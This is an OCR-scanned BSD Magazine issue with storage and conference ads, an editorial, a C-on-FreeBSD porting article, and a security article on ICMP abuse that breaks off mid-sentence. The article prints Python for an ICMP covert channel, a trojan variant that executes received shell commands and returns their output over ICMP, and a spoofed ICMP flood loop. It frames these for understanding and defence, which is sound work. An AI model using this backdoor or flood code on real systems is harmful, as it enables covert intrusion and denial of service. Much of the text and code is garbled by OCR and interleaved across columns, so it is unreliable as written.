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HOW IMPORTANT IS YOUR DATA? 


Years of family photos. Your entire music 
and movie collection. Office documents 
you've put hours of work into. Backups for 
every computer you own. We ask again, how 
important is your data? 


NOW IMAGINE LOSING IT ALL 


Losing one bit - that’s all it takes. One single bit, and 
your file is gone. 


The worst part? You won't know until you | 
absolutely need that file again. Example of one-bit corruption 


THE SOLUTION 


The Mini boasts these state-of-the- 


The FreeNAS Mini has emerged as the clear choice to 
art features: 


save your digital life. No other NAS in its class offers 


i ry and ZFS bitr 
ECC (error correcting code) memory and ZFS bitrot Se ee ee 


protection to ensure data always reaches disk . Up to 16TB of storage capacity 
without corruption and never degrades over time. - 16GB of ECC memory (with the option to upgrade 
to 32GB) 


; « 2x 1 Gigabit network controllers 
No other NAS combines the inherent data integrity si amaois aanagementeort (PN 


and security of the ZFS filesystem with fast on-disk - Tool-less design; hot swappable drive trays 
encryption. No other NAS provides comparable power RCS NES ihetalemanacomngured 

and flexibility. The FreeNAS Mini is, hands-down, the 
best home and small office storage appliance you can 
buy on the market. When it comes to saving your 
important data, there simply is no other solution. 
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FREENAS 


CERTIFIED 
STORAGE 


With over six million downloads, 
FreeNAS is undisputedly the most 
popular storage operating system 
in the world. 


Sure, you could build your own FreeNAS system: 
research every hardware option, order all the 

parts, wait for everything to ship and arrive, vent at 
customer service because it hasn't, and finally build it 
yourself while hoping everything fits - only to install 
the software and discover that the system you spent 
days agonizing over isn’t even compatible. Or... 


MAKE IT EASY ON YOURSELF 


As the sponsors and lead developers of the FreeNAS 
project, ixsystems has combined over 20 years of 
hardware experience with our FreeNAS expertise to 
bring you FreeNAS Certified Storage. We make it 
easy to enjoy all the benefits of FreeNAS without 
the headache of building, setting up, configuring, 
and supporting it yourself. As one of the leaders in 
the storage industry, you know that you're getting the 
best combination of hardware designed for optimal 
performance with FreeNAS. 


Every FreeNAS server we ship is... 


» Custom built and optimized for your use case 

» Installed, configured, tested, and guaranteed to work out 
of the box 

» Supported by the Silicon Valley team that designed and 
built it 

» Backed by a 3 years parts and labor limited warranty 
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As one of the leaders in the storage industry, you 
know that you're getting the best combination 

of hardware designed for optimal performance 

with FreeNAS. Contact us today for a FREE Risk 
Elimination Consultation with one of our FreeNAS 
experts. Remember, every purchase directly supports 
the FreeNAS project so we can continue adding 
features and improvements to the software for years 
to come. And really - why would you buy a FreeNAS 
server from anyone else? 


FreeNAS 1U 

- Intel® Xeon® Processor E3-1200v2 Family 

- Up to 16TB of storage capacity 

* 16GB ECC memory (upgradable to 32GB) 

« 2x 10/100/1000 Gigabit Ethernet controllers 
« Redundant power supply 


FreeNAS 2U 
- 2x Intel® Xeon® Processors E5-2600v2 Family 
- Up to 48TB of storage capacity 
- 32GB ECC memory (upgradable to 128GB) 
« 4x 1GbE Network interface (Onboard) - 
(Upgradable to 2 x 10 Gigabit Interface) 
« Redundant Power Supply 


http://www.iXsystems.com/storage/freenas-certified-storage/ 
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EDITOR’S WORD 


Dear Readers, 


hope you had a great New Year’s and that you have a lot 

of new energy to start this year and fulfill your plans and 

resolutions. | do not want to bore you with details as you can 

find them in the following pages of this issue. | will briefly tell 
you what is inside our BSD publication this time. 


| collected the articles written by experts in the field to provide 
you with the highest-quality knowledge. In this issue, you will 
find articles written by David Carlier, Saumya Dwivedi and Parag 
Gupta, Mark Sitkowski, Mark Ryan M. Talabis, Robert McPherson, 
|. Miyamoto, Jason L. Martin, and Annie A. Zhang. 


You will also find the monthly column by Rob Somerville. 
At the end, | decided to add the Presentations section that was 
designed for companies that want to present their profile, goals, 
ideas, and products. It can be interesting for you to read. 


To end, | would like to thank you for reading our magazine 
and for being with us. We only need 3 more years to celebrate 
the 10th anniversary of the magazine. Everything we do, we do 
with you in mind. We are grateful for every comment and opinion, 
positive and negative. Every word from you lets us improve BSD 
Magazine and brings us closer to the ideal form of our publication. 


Enjoy reading, 
Ewa & the BSD team 
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IN BUSINESS 


FreeNAS 
in an Enterprise Environment 


By the time you're reading this, FreeNAS has been downloaded 
more than 5.5 million times. For home users, it’s become an 
indispensable part of their daily lives, akin to the DVR. 
Meanwhile, all over the world, thousands of businesses 
universities, and government departments use FreeNAS to 
build effective storage solutions in myriad applications 


What you willearn.. 7E INTERRUPT THIS MAGAZINE TO BRING 


« How TrueNAS builds off the strong points of the FreeBSD and 


seta F YOU THIS IMPORTANT ANNOUNCEMENT: 
, | | | | a 


* How TrueNAs meets modern storage challenges for entery 
THE PEOPLE WHO DEVELOP FREENAS, THE WORLD’'S MOST 
T he FreeNAS operating systems is fre; POPULAR STORAGE OS, HAVE JUST REVAMPED TRUENAS. 


the public and offers thorough doc 
active community, and a feature-rig 
the storage environment. Based on Free 
can share over a host of protocols (SM§ 
FTP, iSCSI, etc) and features an intuiti 
the ZFS file system, a plug-in system 
much more. 
Despite the massive popularity g 
aren't aware of its big brother dut 
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professionally-supported line of, 
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FreeBSD Corner 


The Journey of a C Developer 
in the FreeBSD World 

David Carlier 

Moving from Linux to FreeBSD involves quite a number of 
changes; some gains and some losses. As a developer for most 
of the programming languages, especially the high level ones, 
there are no meaningful disturbing changes. But for languages 
like C (and its sibling C++), if you want to port your softwares, 
libraries, etc, some points need to be considered. 
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Exploits Using ICMP Protocol 

Saumya Dwivedi and Parag Gupta 
Internet Control Message Protocol (shorthand, ICMP) is a part 
of the Internet Protocol used by network devices to send error 
messages to other connected hosts; for example, to indicate 
that a requested service is not available or a router could not 
be reached. But many times, this protocol is abused to transfer 
malicious data packets. This article will discuss the vulnerabilities 
and security loopholes associated with these types of data 
transfers and potential options to prevent these security attacks. 
You will learn how to understand ICMP and its role in networking. 


Dear JP Morgan, Target, Neiman 
Marcus, Michael’s, Home Depot... 
Mark Sitkowski 

If you want to design a hypothetical IT installation, which can be 
considered to be either a retail operation, or a financial institution, 
equipped with either POS or ATM terminals, operated by bank 
cards or store cards. The system will possibly consist of a web 
server, with your landing page and login page, a database server, 
a business server, which contains transaction records and account 
details, and an authentication server, which confirms the identity 
of each system user. You will learn the list of all the components of 
a bulletproof IT system, and which one you should choose to omit 
various parts, if the extra risk is justifiable. 
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Information Security Analytics 
Finding Security Insights, Patterns, 
and Anomalies in Big Data. 

Access Analytics 

Mark Ryan M. Talabis, Robert McPherson, 


I. Miyamoto, Jason L. Martin, D. Kaye 

There are so many ways that malicious users can access IT 
systems right now. In fact, the very technologies affording us the 
convenience to remotely access our IT systems are the ones 
that are being manipulated by malicious users. In today’s IT 
environment, physical access is no longer a hindrance to gaining 
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access to internal resources and data. The authors would like to 
provide some techniques and tools that could help you in these 
types of scenarios. Some of the things the authors will explore 
include knowledge engineering, by means of programming 
detection strategies. If you do not know how to program, do not 
worry. The authors will provide simple techniques and step-by- 
step, walkthrough instruction to get you going. 


Expert Says... 


FreeNAS 9.3 Features — Support for 
VMware VAAI 38 


Annie A. Zhang 
Column 


With the recent deaths from the Charlie 
Hebdo terrorist attack in Paris, what 
implications does this tragic event have 
for freedom of speech not only for print 
journalists but the Internet community 


at large? 40 
Rob Somerville 

Presentations 

Stratoscale 42 
BSD Team 


At Stratoscale, the teams focused on how technology can be 
leveraged to help IT teams make better and more profitable 
usage of existing infrastructures. They know that data needs are 
growing at an ever-increasing pace, so they've build a hardware- 
agnostic and hyper-converged software solution that lowers the 
cost of scale-out and allows your IT infrastructure to keep up 
with business growth. 

AexolGL — New 3D Graphics Engine 4S 
AexolGL Team 

Aexol specialises in creating mobile applications. It was created 
by Artur Czemiel, a graduate of the DRIMAGINE 3D Animation 
& VFX Academy, who has a lifelong interest in 3D technology. 
He first started to realise his passion by working in the film 
industry. Artur is the co-creator of the special effects in the 
Polish production “Weekend” and the short film “Hexaemeron’, 
which was awarded the Finest Art award at the Fokus Festival 
and nominated as the best short animated film at fLEXiff 2010 
Australia. The experience gained by working in the movie 
industry and in the mobile applications market was the basis 
for creating AexolGL — a tool designed to make work easier for 
Aexol and other programmers around the world. 
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The BIGGEST, the BEST, the TEXAS AIST 
SharePoint Conference ever’ 


SharePoint is at the Crossroads — SPTechCon 
Which Way Will You Go? RK 


SharePoint in the cloud or on premises? Or both? Come to SPTechCon Austin = 

2015 and learn about the differences between Office 365, cloud-hosted rebrua ry 5 | l : 201 
SharePoint, on-premises SharePoint, and hybrid solutions and build your Renaissance Austin Hotel 
company’s SharePoint Roadmap! 

For developers, the future means a new app model and new app paradigms. S0+ Classes 

For IT pros and SharePoint admins, it’s trying to retain control over an installa- 

tion that’s now in the cloud. For information workers and their managers, it’s AO + Microsoft FX ert 
about learning how to work ‘social.’ But it’s not for everyone. p 
Where do you need to be? Speakers 

The answer is simple: SPTechCon Austin. With a collection of the top _Ci 
SharePoint MVPs and expert speakers, more than 80 classes and tutorials Get Your Texas Sized 
to choose from and panels focused on the changes in SharePoint, Registration Discount— 


SPTechCon will teach you how to master the present and plan for the future. 


Register NOW! 


A Event 


FREEBSD CORNER 


The Journey 


of a C Developer 
in FreeBSD’s World 


Moving from Linux to FreeBSD involves quite a number 

of changes; some gains and some losses. As a developer, 

for most of the programming languages, especially the high 
level ones, there are no meaningful disturbing changes. 

But for languages like C (and its sibling C++), if you want to 
port your softwares, libraries, etc, some points might need 


to be considered. 


What you will learn... 


« How to move from Linux to FreeBSD 
¢« How to develop under FreeBSD 


Ss is often the case with C, it is not especially straight- 
A errs the code itself might need some changes, 

minus the pure POSIX part. Let’s say your program 
needs to use some known network functions. 


#include <sys/param.h> = BSD defined, FreeBSD current 


version etc... 


#if defined (BSD) 
#include <netinet/in.h> 
#endif 

#include <sys/types.h> 


#include <sys/socket.h> 


#include <arpa/inet.h> 


hic 
Main(ink arge, char *argv |.)) 


{ 


BSD 


What you should know... 


¢ Basic knowledge of C programming 


Struct an addr ain; 
const char *ip =-arqv[1]; 


If (inet pton (Ar INET, ip, &1n) == —1) 
Here we have a more complex case; for example, how 
do we get the MAC Address of an interface? 
Le 
main(int argc, char *argv[]) 


{ 


struct ifreg if; 


char hwaddr[6] = { 0 }; 
#if defined( linux_ ) 


if (1octl(clsock, SIOCGIFHWADDR, &if) == 0) 
memcpy (hwaddr, if.ifr hwaddr.sa data, sizeof (hwaddr) ); 
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#else if defined (BSD) 

struce sockaddr di *cl = (struct sockaddr dl ™*) (27,44. 
addr) ; 

unsigned char *p = (unsigned char *)LLADDR(cl); 

memcpy (hwaddr, p, sizeof (hwaddr) ); 

#endif 


In addition, FreeBSD provides a bunch of specific func- 
tions like strlcpy/stricat (Safer versions of strcpy/strcat) and 
strtonum family functions, all of which are available in the 
base whereas Linux must install the separate BSD library 


to have them. If you have any doubts about any functions, 
all manpages are available and very well written. 


The environment 

FreeBSD is shipped by default with clang whereas Linux re- 
lies on GCC suite. If you heavily use OpenMP, clang does 
not provide it yet so you might need to install GCC from 
ports. Somehow, clang mostly compiles faster and provides 
more informative warning and error messages. Fortunately, 
they share a significant amount of common flags. 


The Journey of a C Developer... 


On Linux, you may use a custom memory allocator dur- 
ing your development like jemalloc. It's a very handy and 
useful library which allows you to generate statistics, to fill 
freed memory with specific values, and to spot corrupted 
memory usage. 

Good news! You do not need to install it—FreeBSD libc’s 
malloc (aka phkmalloc) uses jemalloc internally. To print 
Statistics from your application, for example, you need to 
include malloc. mp.h instead of jemalloc/jemalloc.h. 

As for the makefiles, this is the BSD format which differs 
from GNU style: 

A basic makefile for a library: 


LIB= mylib 

SHLIB MAJOR= 1 

SHLIB MINOR= 0 

=> In addition to the static (profiled and non profiled 
one), it will compile the shared version 


SRCS= my La boe 


inelude <bsd.lib.mk> 


better safe than sorry 
www.demyo.com 


FREEBSD CORNER 


A basic makefile for an application: 


PROG= myprog => will compile an app called myprog 
SRCS= Malic Prog.c 
CFLAGS+= =19{<CURDIR) fs./mylib 


=> always concatenate cflags, some like fstack-protector, 
-Qunused-arguments .. are added automatically 

LDADD= -lutil -lmylib 

S{LIBUTIL} 

=> linked to libutil.a ${.CURDIR}/../mylib/libmylib.a 


DPADD= 


-include <bsd.prog.mk> 


FreeBSD can handle GNU via (gnu)make, libtool, etc via 
the ports. 

Or to save the effort of porting this part, it might be more 
handy to use cmake or scons. 


The publication 

You might want to publish your library / application in pure 
FreeBSD’s path. You can make a port which can provide 
some options for the user. It can download the source and 
compile it with its dependencies in a natural manner. In 
addition, you can build a binary package to facilitate the 
distribution. Example of a port Makefile: 


PORTNAME= mylib 
PORTVERSION= 1 
PORTREVISION=0 


MAINTAINER= john.doe@email.com 


LICENSE= BSD 


OPTIONS DEPINE= CURL. SUPPORT 
CURL SUPPORT DESC= Enable Curl support 
=> Will display to the user the curl support then will add 


a flag during compilation 
if 2{PORT OPTIONS:MCURL SUPPORT} 
CFLAGS+= —-DCURL 
.endif 


-include <bsd.port.mk> 


For instance, you can put the archive .tar.gz of the li- 
brary in /usr/ports/distfiles, then type make checksum. 
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Then, make install will compile and install it in /usr/local ... 
The handbook of making ports is very useful to read. 

Furthermore, you can build a binary version of this 
port to facilitate its distribution. Simply as it is, pkg create 
mylib ... It will create a txz archive in the current folder ... 
In the end, pkg install mylib will install it ... 


The conclusion 

Developing under FreeBSD is not the extreme challenge 
you might think it is. Even better, from coding to publish- 
ing, everything is thought out and made in a constant way 
without any external dependencies. If you even want to 
go further, like kernel development, again it is easy and in 
base. So there is no real reason to stay away from Free- 
BSD anymore, you are more than welcome. 


DAVID CARLIER 


David Carlier has been working as a software developer since 2001. 
He used FreeBSD for more than 10 years and starting from this year, he 
became involved with the HardenedBSD project and performed seri- 
ous developments on FreeBSD. He worked for a mobile product com- 
pany that provides C++ APIs for two years in Ireland. From this, he be- 
came completely inspired to develop on FreeBSD. 


About Hardened BSD 


The HardenedBSD project was created in 2014 by Oliver Pinter 
and Shawn Webb. The project aims to provide security enhance- 
ments to the FreeBSD project. We plan to upstream most, if not 
all, of our projects. 

The core HardenedBSD team consists of: 


¢ Oliver Pinter 
¢ Shawn Webb 


The developer team consists of: 


¢ David Carlier 

¢« Nathan Dautenhahn 
Danilo Egea Gondolfo 
Oliver Pinter 
Shawn Webb 


The following people and organizations have contributed to the 
HardenedBSD project: 


Ilya Bakulin 

Bryan Drewery 

Danilo Egea Gondolfo 

Dag-Erling Sm@rgrav 

Robert Watson 

Hunger 

SoldierX — Donated a sparc64 and a BeagleBone Black 
Hyper6 — Designed logo 

Automated Tendencies — Substantial monetary donation 
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Exploits Using ICMP 


Protocol 


Internet Control Message Protocol (shorthand, ICMP) is a part 
of the Internet Protocol used by network devices to send 
error messages to other connected hosts; for example, to 
indicate that a requested service is not available or a router 
could not be reached. But many times, this protocol is abused 
in transferring malicious data packets. This article discusses 
the vulnerabilities and security loopholes associated with 
such types of data transfers and potential options to prevent 


these security attacks. 


What you will learn... 


¢ Understanding ICMP and its role in networking 
« ICMP as a potential host for malicious activities 
¢ Potential Attacks with ICMP 

¢ Security measures 


across network boundaries (source:wikipedia). The In- 

ternet Protocol (IP) is based on a connectionless mode 
of transmission and hence is not designed to be absolutely 
reliable. Since the network infrastructure is unreliable, it is 
important to notify the sender with appropriate messages 
in case something goes wrong like packet loss, data cor- 
ruption or out-of-delivery order. This is where Internet Con- 
trol Message Protocol steps in. It is the mechanism used 
to give feedback on network problems that have blocked 
or intercepted packet delivery. Higher-level protocols, like 
TCP, are able to realize that packets aren't getting through, 
but ICMP provides a method for discovering more specif- 
ic problems, such as “TTL exceeded” or “need more frag- 
ments.” ICMP differs from transport protocols such as TCP 
and UDP in that it is not typically used to exchange data 
between systems (although ICMP has been used for data 
transfer for quite some time now via ICMP Tunnelling). 
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What you should know... 


¢ Basic knowledge of Computer networks and protocols like IP 
and ICMP 

¢ Basic knowledge of network infrastructure. 

- Basic knowledge of packet programming. 


The point to note is that the purpose of these control 
messages is to provide feedback about problems in the 
communication environment, not to make IP reliable. 
There is still no guarantee that a packet will be delivered 
or a control message will be returned. But the majority of 
ICMP message types are required for proper operation 
of IP, TCP and other protocols, ping and traceroute being 
one of the prominent utilities using ICMP. 


ICMP Packet Structure and Details 

ICMP uses the basic support of IP like a higher level pro- 
tocol; however, ICMP is actually an integral part of IP 
and must be implemented by every IP module. An ICMP 
packet is therefore an IP packet with ICMP in the IP data 
portion. Every ICMP message also contains the entire IP 
header from the original message so the end system will 
know which packet actually failed. The first eight bytes 
of the original IP data will be included as well, and this 
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is normally the TCP or UDP header. Below is a figure of 
IP packet format. The ICMP module can be seen in the 
shaded portion. Some of the important fields are men- 
tioned below. 


Version IHL 


Identification 


TTL Protocol = Ox 


Source Address 


TOS = tii) 


Total Length 


Fragment Offset 


Header Checksum 


Destination Address 


Options (optional) 


Checksum 


ICMP data (variable) 


Padding 
Type Code 

Figure 1./P packet format 

¢ IP Header: Protocol set to 1 (for ICMP) 

¢ Type (8 bits): For example O- ping reply, 3 — Destina- 
tion Unreachable, 8- ping request 11- Time Exceeded 

¢ Code (8 bits): Subtype of message 

¢ Checksum (16 bits): It is the 16-bit one’s complement 
of the one’s complement sum of the ICMP message 
starting with the Type field. 

¢ Data load (Can be an arbitrary length, left to imple- 
mentation detail. However, must be less than the 


Maximum Transmission Unit of the network or risk 
being fragmented). 


The address of the source in an echo message will be 
the destination of the echo reply message. To form an 
echo reply message, the source and destination address- 
es are simply reversed, the type code changed to O, and 
the checksum recomputed. The data received in the echo 
message must be returned in the echo reply message. 

The identifier and sequence number may be used by 
the echo sender to aid in matching the replies with the 
echo requests. For example, the identifier can be used 
to identify a session (similar to ports in TCP and UDP), 
and the sequence number might be incremented on each 
echo request sent. Code 0 may be received from a gate- 
way or a host. 

Infrequent problems, such as the IP checksum being 
wrong, will not be reported by ICMP. The premise is that 
TCP or other reliable protocols can deal with this type of 
packet corruption else do not care about such small pack- 
et losses. 

The ICMP messages typically report errors encoun- 
tered in the processing of packets. To avoid the infinite re- 
gress of messages on messages, no ICMP messages are 
sent about ICMP messages. If ICMP messages are sent 
in response to other ICMP messages, they quickly multi- 
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ply and create a storm of ICMP packets. ICMP messages 
cannot be sent in response to a broadcast or multicast 
addresses either, to prevent broadcast storms. Similarly, 
ICMP messages are only sent about errors in handling 
fragment zero of fragmented packets (Fragment zero has 
the fragment offset equal zero). [Source:RFC 792] 


ICMP as a potential host for malicious activities 
ICMP Vulnerability 

ICMP is generally not considered a threat, at least not by 
the majority of network administrators. It is very common 
to add security mechanisms (Intrusion detection and pre- 
vention systems, etc) to a corporate network, but in the 
end all types of ICMP packets, with all payload sizes etc, 
pass freely at least from within the private network to the 
outside world. This technique is used to send sensitive 
data outside a private network without relying on SMTP, 
HTTP or other upper layer protocols that are commonly 
monitored and logged. 

The vulnerability in ICMP exists because RFC 792, 
which is IETF’s rules governing ICMP packets, allows 
for an arbitrary data length for any type O (echo reply) or 
8 (echo message) ICMP packets. 

Firewalls, depending on the services required by their 
internal networks, totally block or partially filter Internet 
packets. IP Filter, for example uses stateful packet filter- 
ing. The state engine not only inspects the presence of 
ACK flags in TCP packets but also includes sequence 
numbers and window sizes in its decision to block or to al- 
low packets. However, IP Filter does not check the con- 
tent of ICMP packets and hence fails to prevent covert 
channels that can arise due to misuse of the payload of 
ICMP packets. Therefore, although TCP and UDP contin- 
ue to be a subject for studies in vulnerabilities, ICMP also 
provides several means for stealth traffic. 


Past Security Threats and Attacks 

In early February 2000, a distributed denial of service at- 
tack was launched against many popular Internet sites. 
It is reported that almost all of the tools used on the distrib- 
uted denial of service (DDOS) attacks these internet sites, 
have used ICMP for covert communications between the 
DDOS clients and the attacker's handler program. Since 
ICMP tunneling is very simple to deploy and can cause 
a significant amount of damage, it has been classified as 
a high risk security threat by Internet Security Services. 
Some of the most widely known distributed denial of ser- 
vice attack tools like Tribe Flood Net2K and Stacheldraht 
rely on ICMP tunneling to establish communication chan- 
nels between the compromised machines and the hack- 
ers machine. 
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Potential Attacks through ICMP 

ICMP is supposed to be a relatively simple protocol, but it 
can be altered to act as a medium for evil purposes. It is 
therefore important to understand how this protocol can 
be used for malicious purposes. This understanding fur- 
ther enables us to counter such attacks and be prepared 
for them. 


ICMP Tunneling 

An ICMP tunnel (also known as ICMPTX) establishes 
a covert connection between two remote computers (a cli- 
ent and proxy), using ICMP echo requests and reply pack- 
ets. An example of this technique is tunneling complete 
TCP traffic over ping requests and replies. ICMP tunnel- 
ing works by injecting arbitrary data into an echo packet 
sent to a remote computer. The remote computer replies 
in the same manner, injecting an answer into another IC- 
MP packet and sending it back. The client performs all 


communication using ICMP echo request packets, while 
the proxy uses echo reply packets. 

ICMP tunneling can be used to bypass firewall rules 
through obfuscation of the actual traffic. Depending on the 
implementation of the ICMP tunneling software, this type 
of connection can also be categorized as an encrypted 
communication channel between two computers. With- 
out proper deep packet inspection or log review, network 
administrators will not be able to detect this type of traffic 
through their network. 

The following code snippet gives an example of a chat 
application developed using ICMP tunnelling: 


¢ Impacket: Install the latest stable release from here: 
https://pyp!i.python.org/pypi/impacket 

¢ Socket: This python library is used to make a SOCK _ 
RAW for receiving and sending data packets. Us- 
ing SOCK_RAW, the application connects directly to 


Listing 1. An example of a chat application developed using ICMP 
tunnelling 


5 sulci joyce clasic eisjolli@eeie joy (eiicsie syewhe 12 eielclicsisis 


and destination IP address and start chatting) 


#!/usr/bin/python 
import socket 

Lrom Ssocker Ampork * 
import threading 
import time 


iene Ss aseparell 


MOO ees) .c 


from impacket import ImpactPacket as imp 


source = dest = sock = 


Get so teialy nave lens rane =r aame)e: 
joeiae  evssall cs) mere Telaveicre ioral! 
Sys.ex7b (0) 


def getSocket (sock): 
# Open a raw socket listening on all ip addresses 
Sock — socker(At INET, SOCK RAW, EPPROTO ICMP) 
SOc sSersoOckopE ( IPPROTO Ir 7 iP BPRINCL |) 
SOc barnes aa) ) 


return sock 


OGE COlesuUruceracker( segues tyee, Message, ssOUree, 
dest): 


icmp = imp.ICMP() # Making ICMP packet 


CUS SSE WSS eyes (icSclesic InyisS) 7; INecuIes: joe 

icmp.contains (imp.Data (message) ) 

ip = imp.IP() # IP packet to wrap the icmp 
packet 

1s SSE to) Sige: (SOUS) 

Donoso. Upecs Rides tr) 

1 JO) (ele deel aLions) (| Liemyo) 


PS EUIGM TOS jSeeke |) 


clei Ce jel selliecs eolele loseclsic) 2 
SOUnCC Oy — sl eeNeader (S.-i source] dedrecs als 
second last 4 bytes 
# converting to dotted decimal format 


Pac Kegs Ounce yadie roo Wot ol ol On (Soumee ie | O1)y, 
Geol (SOULS 176 | Il]|)) - eieel(soulecS 149)\2 ||) 5 ech Soules 
ate, Sp) 


Ceturn Pack: ysource adic 


def processMessage (message) : 


print ‘Msg:%s’ % (message) # CHANGE 
def receive(): 
global sock, source 
while True: 
data = sock.recv(1024) # received data 


ip vteader ~~ — data: 20] # IP header is first 20 
bytes 

iemp header = data[20:28] # ICMP header is next 8 
bytes 


Lenpeeype = Ord (data) 2) |) 
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No. Time SOUrce Destination Protocol Length Info 
-_ ~10.000000—s«10.0.0.1 -10.0.0.2 ‘ICMP 87 Echo (ping) request id=0x0000, seq=0/0, ttl=255 
J00# 16.6.6.2 10.0.0.1 ICMP 67 Echo (ping) reply id-0x0000, seq-0/0, ttl-6G4 


ap 


b Internet Protocol version 4, Src: 10.0.0.1 (10.0.0.1), Dst: 10.0.0.27 (10.0.0.7) 


~ 


¥ Internet Control Message Protocol | 


Type: 8 (Echo (ping) request) 
Code: 0 
Checksum: OxaeSa [correct] 
Identifier (BE): @ (Ox0000) 
Identifier (LE): 0 (OxGGg00) 
Sequence number (BE): © (OxG000) 
Sequence number (LE): & (Ox0000) 
[Response In: 2] 
~ Data (45 bytes) 
Data: 48696: 6c6! 20426/ 6227120486[ TOSS 207961 752061726520... 
[Length: 45] 


oO OO DE OO BU OO OO UO 
d4 oo ff o1 


(| Data (data), 45 bytes Packets: 2 Displayed: 2 Marked: 0 Profile: Default 


Figure 2. The CMP packet as captured by wireshark 


message = data[28:] # Rest is our Payload/Msg Saueloelll sy Uelioie bi Sabefale lh, SIRE INI: svejaetl loveuevellicis 
pela sethecs ache = Clon seclac SoulacS eiclealo laser) glicbal sock, dest, source 

ie Pace soourcevadr | |—ssourcesand temp eyes |= Or 

CHANGE sock = getSocket (sock) 


processMessage (message) 


N/T. 
5 


Lt Source a3 


def write(): SOUCCS = leer alimjelblic (I viste, \yowlie ao 8) 
Global sock, source, dest PE COeSt. sue. es 
while True: Close = cei suger oS whose seigiie sim 193) 


MSSSeS = ies i ajoiule | coule ”)) 
packet = constructPacket(8, message, source, dest) # Create new threads 
sock.sendto(packet, (dest, 0)) # Sending the packet threadl = Reader(1, “Reader-1”) 
threadl.daemon = True 
class Reader (threading.Thread) : thread2 = Writer(2, “Writer-1”) 
cee gil (Sele, ielgeerclb), eins) : thread2.daemon = True 


Elimead Sieg teead unc mce Pe) 


self.threadID = threadID # Start new Threads 
self.name = name thimeadcdi start () 

def run(self): bhread2. Stare () 
receive () while True: 


time.sleep (1) 
class Writer (threading.Thread) : 
det nu sete enecad ly mane) Peele ie = ae llciles 
elieseyol ence Wekcseve.5  tkdabie y(( seis | main () 
self.threadID = threadID 
self.name = name 
def run(self): 


write () 


def main(): 
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the IP layer and does not use either the TCP or UDP 
transport. 

¢ Threading: We made two threading classes: Reader 
and Writer. Instantiate one thread from each class so 
that one thread listens to the incoming ICMP packets 
and the other replies to those packets. 

¢ Chat Protocol: The program will send the message in 
a ICMP ECHO_REQUEST to the other computer. 


Figure 2 is the snapshot of the ICMP packet as captured 
by wireshark. 


Trojan Horse 

Covert Channels are methods in which an attacker can 
send data in a protocol that is undetectable. Covert Chan- 
nels rely on techniques called tunneling, which allows one 
protocol to be carried over another protocol. ICMP tunnel- 
ing is a method of using ICMP echo-request and echo- 
reply as a carrier of any payload an attacker may wish to 
use, in an attempt to stealthily access, or control a com- 
promised system. Since such channels are hidden, covert 
channels are generally difficult to detect using a system's 
normal or unmodified security policy. This makes it an at- 
tractive mode of transmission for a Trojan. 

Although the payload of ICMP packet often contains tim- 
ing information of packet delivery, there is no check by any 
device about the content of the data. So, as it turns out, 
this amount of data can also be arbitrary in content as well. 
We can construct Trojan packets which are masqueraded 
as common ICMP_ECHO traffic and can be used as a back- 
door into a system by providing a covert method of getting 
information and control on a target machine. Generally, Tro- 
jan softwares come injected into a reliable looking software 
archive intended to gain the system password. When a user 
downloads this software, the software demands to install it 
using ‘sudo’ powers. At this time the trojan gets entry into 
the computer and starts executing itself. The software re- 
starts itself even after reboot, so unless someone is look- 
ing for it specifically, it is very difficult to find it. This trojan 
can be used to execute commands remotely on the victim's 
machine which sends the output to the hacker’s comput- 
er. Since the entire communication happens through ICMP 
packets, which are normally used for network and host de- 
tection, such messages are often ignored. 

As shown earlier, trojan packets can be programmed 
through ICMP tunneling and can be used to transfer files 
across systems or execute system commands remotely 
(Some commands may need a sudo access, but that infor- 
mation can be easily compromised if the user sufficiently 
trusts the wrapping software and enters the credentials). 
A rough example of the program that can execute the 
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command on the victim’s machine can be made out of the 
chat program we discussed earlier by changing the pro- 
cess Message function on the victim’s computer applica- 
tion to act something like the following: 


def executecmd( cmd ): 
p = subprocess.Popen( cmd ,shell=True, stdout=subprocess. 
PIPE, stderr=subprocess.STDOUT) 


return p.communicate () 


def processMessage (message) : 
global source, sock, dest 
retval = executecmd (cmd) 
constructPacket (8, retval, source, dest) 
sock.sendto(packet, (dest, 0)) 
Distributed Denial Of Service attacks 
Following is a simple ICMP based DDOS attack program. 
It exposes the vulnerability of a user even if his/her ma- 
chine has not been compromised. It sends ICMP packets 
to the victim’s machine containing random data to which 
the victim’s computer is forced to send replies. The pack- 
ets may have a spoofed source address (and cloned MAC 
address if possible) so that the hacker source does not 
get bombarded with the echo replies and it makes it diffi- 
cult to trace back the origin of the attack. 


import random, string 


def DDOS (sock, destination 1p): 
while True: 
Ley: 
randomString = ‘’.jJoin(random.choice (string. lowercase) 
for iin range (34) ) 
packet = constructPacket (8, randomString, ‘’, destina- 
CLOW - 1p) 
sock.sendto (packet, (dest, 0) ) 
except : 


pass 


In the presence of requests with a fake source address 
(“spoofing”), hackers can make a target machine send 
relatively large packets to another host. Note that an IC- 
MP response is not substantially larger than the corre- 
sponding request, so there is no multiplier effect there: 
it will not give extra power to the attacker in the context 
of a denial of service attack. It might protect the attacker 
against identification, though. 

The “smurf” attack, named after its exploit program, is 
a similar network-level attack against hosts. A perpetra- 
tor sends a large amount of ICMP echo (ping) traffic at 
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IP broadcast addresses with the spoofed source address 
of a victim. On a multi-access broadcast network, there 
could potentially be hundreds of machines to reply to each 
packet. Currently, the providers/machines most common- 
ly hit are IRC servers and their providers. The spoofed ad- 
dress system gets hit by a large amount of traffic that the 
intermediary (broadcast) devices generate. 


Security Measures 

Blocking ICMP 

It is common practice to disable or block ICMP requests 
altogether on publicly visible servers. Google responds to 
Ping requests while Microsoft does not. Although this is 
effective, it may not be realistic for a production or real- 
world environment. 

Take the case of PATH MTU. Path MTU (PMTU) dis- 
covery is the mechanism that protocols use to discover 
the largest supported MTU (maximum transmit unit) along 
the path, in hopes of avoiding fragmentation. The largest 
possible size is determined by the sender beginning with 
the MTU size of its local interface, and then simply ship- 
ping the data with the DF (don’t fragment) bit set in the IP 
header. Everything will work as expected, or the sender 
will get back a type 3 ICMP error, with the code for “Frag- 
mentation Required but the DF Flag is Set.” When this 
happens, the sender knows that it must reduce the size of 
the data it is sending. If an error doesn't return, it assumes 
that the MTU is fine. 

The main problem with PMTU discovery is that when 
people block ICMP, the error cannot reach the sending 
host. Certain TCP implementations automatically retrans- 
mit with a smaller segment size if they detect a packet ac- 
knowledgement failure, but it is not common. 

Understanding ICMP can be used for making firewall 
policy decisions and understanding routing issues. There 
are applications and other protocols relying on ICMP to 
work properly. The impact of blocking ICMP completely 
should be assessed prior to taking such action. Instead of 
blocking ICMP all together, it is wiser to allow type 3, type 
4 code (Dest unreachable, Don’t fragment) and specifying 
explicit network areas from where you can get/receive or 
